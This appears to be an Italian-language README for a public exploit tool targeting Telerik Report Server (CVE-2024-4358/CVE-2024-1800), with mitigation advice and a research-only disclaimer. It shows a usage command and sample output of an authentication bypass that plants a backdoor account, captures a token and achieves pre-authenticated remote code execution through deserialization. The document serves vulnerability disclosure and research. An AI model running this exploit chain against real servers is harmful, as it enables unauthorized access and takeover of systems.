
Exploit di esecuzione remota di codice pre-autenticato per Telerik Report Server (CVE-2024-4358/CVE-2024-1800) con bypass dell'autenticazione e generazione di payload di deserializzazione.
Catena di exploit per deserializzazione e bypass di autenticazione di Telerik Report Server per CVE-2024-4358/CVE-2024-1800
Un'analisi delle cause profonde della vulnerabilità è disponibile sul mio blog
python CVE-2024-4358.py --target http://192.168.253.128:83 -c "whoami"
(^_^) Progress Telerik Report Server pre-authenticated RCE (CVE-2024-4358/CVE-2024-1800) || Sina Kheirkhah (@SinSinology) di Summoning Team (@SummoningTeam)
(*) nome utente backdoor casuale: oelycslyun
(*) password backdoor casuale: cqgnacxljo
(*) Tentativo di bypassare l'autenticazione
(+) Bypass dell'autenticazione riuscito, account backdoor creato
(+) Salvataggio delle credenziali in credentials.txt
(+) Autenticazione riuscita come oelycslyun con password cqgnacxljo
(*) token ottenuto: zfCch_LNv0PyKfe7eBDYKXV70IOotwNQ2p82aX-JHIMCisVnTW9PWWYUKljhcRw5alubNOg_gXoHT6-hJk4VO-jGZuzmisLIi5A
(*) Nome report casuale generato: qvwdycugmc
(*) Creazione del report malevolo sotto il nome qvwdycugmc
(*) Exploit di deserializzazione completato
Aggiornare all'ultima versione o mitigare seguendo le istruzioni nel Progress Advisory
Questo software è stato creato esclusivamente a scopo di ricerca accademica e per lo sviluppo di tecniche difensive efficaci, e non è destinato a essere utilizzato per attaccare sistemi se non esplicitamente autorizzato. I manutentori del progetto non sono responsabili per l'uso improprio del software. Utilizzare in modo responsabile.